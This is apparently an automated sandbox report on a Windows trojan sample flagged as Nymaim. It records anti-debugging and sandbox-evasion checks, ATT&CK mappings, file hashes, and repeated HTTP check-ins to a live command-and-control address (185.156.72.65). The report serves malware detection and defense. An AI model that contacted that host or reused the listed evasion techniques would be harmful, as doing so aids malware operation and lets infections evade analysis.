      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F02 second address: 4A00F41 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FC7C474F643h 0x00000008 and ecx, 209B59BEh 0x0000000e jmp 00007FC7C474F649h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F41 second address: 4A00F4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 43FFh 0x00000008 popad 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F4A second address: 4A00F73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F645h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC7C474F63Dh 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00F73 second address: 4A00F78 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00FB4 second address: 4A00FD6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F642h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC834B4DD1Bh 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
      Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 646B8B instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 624E57 instructions caused by: Self-modifying code
      Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
      Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
      Source: C:\Users\user\Desktop\file.exe | Window / User API: threadDelayed 792
      Source: C:\Users\user\Desktop\file.exe TID: 7564 | Thread sleep count: 59 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7564 | Thread sleep time: -118059s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7568 | Thread sleep count: 58 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7568 | Thread sleep time: -116058s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 174 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 190 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 176 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 190 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7540 | Thread sleep count: 792 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7540 | Thread sleep time: -1584792s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 194 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 87 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 79 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 79 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7528 | Thread sleep count: 80 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7636 | Thread sleep time: -36000s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7552 | Thread sleep count: 53 > 30
      Source: C:\Users\user\Desktop\file.exe TID: 7552 | Thread sleep time: -106053s >= -30000s
      Source: C:\Users\user\Desktop\file.exe TID: 7544 | Thread sleep time: -42021s >= -30000s
      Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
      Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
      Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

      Anti Debugging

      Source: C:\Users\user\Desktop\file.exe | Process Stats: CPU usage > 42% for more than 60s
      Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
      Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
      Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
      Source: C:\Users\user\Desktop\file.exe | File opened: SICE
      Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
      Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
      Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
      Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

      Stealing of Sensitive Information

      Source: Yara match | File source: 0.3.file.exe.4a30000.0.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 1 DLL Side-Loading | 341 Virtualization/Sandbox Evasion | OS Credential Dumping | 73 Security Software Discovery | Remote Services | Data from Local System | 1 Non-Application Layer Protocol | Exfiltration Over Other Network Medium | Abuse Accessibility Features
      Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 2 Software Packing | LSASS Memory | 341 Virtualization/Sandbox Evasion | Remote Desktop Protocol | Data from Removable Media | 11 Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
      Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 1 DLL Side-Loading | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 Obfuscated Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | 22 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
      Source | Detection | Scanner | Label
      file.exe | 34% | ReversingLabs | Win32.Infostealer.Tinba
      file.exe | 100% | Joe Sandbox ML |
      No Antivirus matches
      No contacted domains info
        Name | Malicious | Antivirus Detection | Reputation
        http://185.156.72.65/add?substr=mixtwo&s=three&sub=nosub | false | | high

        IP | Domain | Country | ASN | ASN Name | Malicious
        185.156.72.65 | unknown | Russian Federation | 44636 | ITDELUXE-ASRU | true
        Joe Sandbox version:41.0.0 Charoite
        Analysis ID:1565668
        Start date and time:2024-11-30 14:04:05 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 6m 49s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:5
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Sample name:file.exe
        Detection:MAL
        Classification:mal100.troj.evad.winEXE@1/0@0/1
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes were analyzed, report is missing behavior information
        • VT rate limit hit for: file.exe
        Time | Type | Description
        08:05:24 | API Interceptor | 11361741x Sleep call for process: file.exe modified
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        185.156.72.65 | file.exe | malicious | Amadey, Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        185.156.72.65 | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65/add?substr=mixtwo&s=three&sub=nosub
        185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65/soft/download
        185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
        185.156.72.65 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc | 185.156.72.65/files/download
        185.156.72.65 | file.exe | malicious | Nymaim | 185.156.72.65/soft/download
        No context
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Amadey, Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Amadey, Cryptbot, LummaC Stealer, Nymaim, Stealc, Vidar | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Nymaim, Stealc | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        ITDELUXE-ASRU | file.exe | malicious | Nymaim | 185.156.72.65
        No created / dropped files found
        File type:PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit):7.947656894539058
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.96%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name:file.exe
        File size:2'021'888 bytes
        MD5:7b58f626a6acdca919aaae907585b8c0
        SHA1:9e81feb90f37e4b80ab06846a5044330d616b748
        SHA256:e57a172afd44d0e2225c849de5f6e8c2a68e263e371547b2d3f4ba951dccbc00
        SHA512:18811d4ceb94cc6014e3eb055966b7556dbb4ff649652982554af310173ef25eb485a3db766ee91aa3b824bd437679854c9bbc3b86ff1f1d1010bbc00d91b429
        SSDEEP:49152:F4Z9zLjA0m8tW33v4p1Hru40kubUcUFb6AjeBSG:F4ZJ68c33v4vHrh0iTb6AK
        TLSH:2595332BCF9AFA68DCA5037C3A351A09F459F0DF5A6BD0E3B9888B77844835745382D4
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........RC..<...<...<.......<.......<.......<..~G...<...=.3.<.......<.......<.......<.Rich..<.........PE..L....[.d.................|.
        Icon Hash:cfa99b8a8651798d
        Entrypoint:0x8bd000
        Entrypoint Section:.taggant
        Digitally signed:false
        Imagebase:0x400000
        Subsystem:windows gui
        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
        DLL Characteristics:TERMINAL_SERVER_AWARE
        Time Stamp:0x64C65B18 [Sun Jul 30 12:44:08 2023 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major:5
        OS Version Minor:0
        File Version Major:5
        File Version Minor:0
        Subsystem Version Major:5
        Subsystem Version Minor:0
        Import Hash:2eabe9054cad5152567f0699947a2c5b
        Instruction
        jmp 00007FC7C4E21E8Ah
        popcnt ebx, dword ptr [esi]
        add byte ptr [eax], al
        add byte ptr [eax], al
        add cl, ch
        add byte ptr [eax], ah
        Programming Language:
        • [C++] VS2008 build 21022
        • [ASM] VS2008 build 21022
        • [ C ] VS2008 build 21022
        • [IMP] VS2005 build 50727
        • [RES] VS2008 build 21022
        • [LNK] VS2008 build 21022
        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6f05b | 0x6f | .idata
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x66000 | 0x8234 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x4b8094 | 0x18 | wzuxietl
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        (empty) | 0x1000 | 0x65000 | 0x3ae00 | d2ce44b7483c550a52efd93f40800deb | False | 0.9945179803609342 | data | 7.937026675516225 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .rsrc | 0x66000 | 0x8234 | 0x3c00 | a1b001abd42dda0a2a637e41e7ef79a7 | False | 0.9260416666666667 | data | 7.709449479083595 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .idata | 0x6f000 | 0x1000 | 0x200 | 6eb091ff88873fe4d3f846082d82dda4 | False | 0.154296875 | data | 1.0965193819233 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        (empty) | 0x70000 | 0x2a0000 | 0x200 | 5ee8d067dc27469c7ca7fb83316c5f4b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        wzuxietl | 0x310000 | 0x1ac000 | 0x1ab600 | 6d1426ffbba6a3a054d391846f8b74ed | False | 0.9924856957443697 | data | 7.951751188887942 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        wlxeuxhi | 0x4bc000 | 0x1000 | 0x400 | 2a589ce1fa839d931e7e5be6620822f0 | False | 0.7392578125 | data | 6.000780525873557 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        .taggant | 0x4bd000 | 0x3000 | 0x2200 | 4f34644eb3e48cc86cbf6dba95771669 | False | 0.006548713235294118 | DOS executable (COM) | 0.019571456231530684 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
        RT_CURSOR | 0x66460 | 0xea8 | data | | | 1.0029317697228144
        RT_CURSOR | 0x67308 | 0x8a8 | data | | | 1.0049638989169676
        RT_CURSOR | 0x67bb0 | 0x568 | data | | | 1.0079479768786128
        RT_CURSOR | 0x68118 | 0xea8 | data | | | 1.0029317697228144
        RT_CURSOR | 0x68fc0 | 0x8a8 | data | | | 1.0049638989169676
        RT_CURSOR | 0x69868 | 0x568 | data | | | 0.5195652173913043
        RT_ICON | 0x4b80f4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | India | 0.7557603686635944
        RT_ICON | 0x4b80f4 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | Tamil | Sri Lanka | 0.7557603686635944
        RT_ICON | 0x4b87bc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | India | 0.6829875518672199
        RT_ICON | 0x4b87bc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | Tamil | Sri Lanka | 0.6829875518672199
        RT_ICON | 0x4bad64 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | India | 0.8058510638297872
        RT_ICON | 0x4bad64 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | Tamil | Sri Lanka | 0.8058510638297872
        RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | India | 0
        RT_STRING | 0x6cea8 | 0x252 | empty | Tamil | Sri Lanka | 0
        RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | India | 0
        RT_STRING | 0x6d0fc | 0x396 | empty | Tamil | Sri Lanka | 0
        RT_STRING | 0x6d494 | 0x520 | empty | Tamil | India | 0
        RT_STRING | 0x6d494 | 0x520 | empty | Tamil | Sri Lanka | 0
        RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | India | 0
        RT_STRING | 0x6d9b4 | 0x3ee | empty | Tamil | Sri Lanka | 0
        RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | India | 0
        RT_ACCELERATOR | 0x6dda4 | 0x58 | empty | Tamil | Sri Lanka | 0
        RT_GROUP_CURSOR | 0x6ddfc | 0x30 | empty | | | 0
        RT_GROUP_CURSOR | 0x6de2c | 0x30 | empty | | | 0
        RT_GROUP_ICON | 0x4bb1cc | 0x30 | data | Tamil | India | 0.9375
        RT_GROUP_ICON | 0x4bb1cc | 0x30 | data | Tamil | Sri Lanka | 0.9375
        RT_VERSION | 0x4bb1fc | 0x254 | data | | | 0.5436241610738255
        RT_MANIFEST | 0x4bb450 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
        DLL | Import
        kernel32.dll | lstrcpy

        Language of compilation system | Country where language is spoken
        Tamil | India
        Tamil | Sri Lanka
        • 185.156.72.65
        Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
        0 | 192.168.2.4 | 49730 | 185.156.72.65 | 80 | 7524 | C:\Users\user\Desktop\file.exe
        Timestamp | Bytes transferred | Direction | Data
        Nov 30, 2024 14:04:57.156701088 CET | 416 | OUT | GET /add?substr=mixtwo&s=three&sub=nosub HTTP/1.1
        Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
        Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
        Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
        Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
        User-Agent: 1
        Host: 185.156.72.65
        Connection: Keep-Alive
        Cache-Control: no-cache


        Sessions 1 to 10 are from the same process (PID 7524, C:\Users\user\Desktop\file.exe, source IP 192.168.2.4) to 185.156.72.65 port 80, and each carries the same 416-byte OUT request with the same headers as session 0; only the source port and timestamp differ:

        Session ID | Source Port | Timestamp
        1 | 49737 | Nov 30, 2024 14:05:22.227597952 CET
        2 | 49738 | Nov 30, 2024 14:05:47.347841024 CET
        3 | 49746 | Nov 30, 2024 14:05:58.495744944 CET
        4 | 49802 | Nov 30, 2024 14:06:23.603975058 CET
        5 | 49856 | Nov 30, 2024 14:06:48.669321060 CET
        6 | 49912 | Nov 30, 2024 14:07:13.793101072 CET
        7 | 49968 | Nov 30, 2024 14:07:38.838320971 CET
        8 | 50011 | Nov 30, 2024 14:08:04.023833990 CET
        9 | 50012 | Nov 30, 2024 14:08:29.105788946 CET
        10 | 50013 | Nov 30, 2024 14:08:50.168823004 CET

        Target ID:0
        Start time:08:04:53
        Start date:30/11/2024
        Path:C:\Users\user\Desktop\file.exe
        Wow64 process (32bit):true
        Commandline:"C:\Users\user\Desktop\file.exe"
        Imagebase:0x400000
        File size:2'021'888 bytes
        MD5 hash:7B58F626A6ACDCA919AAAE907585B8C0
        Has elevated privileges:true
        Has administrator privileges:true
        Programmed in:C, C++ or other language
        Yara matches:
        • Rule: JoeSecurity_Nymaim, Description: Yara detected Nymaim, Source: 00000000.00000003.1660929409.0000000004A30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
        Reputation:low
        Has exited:false

        No disassembly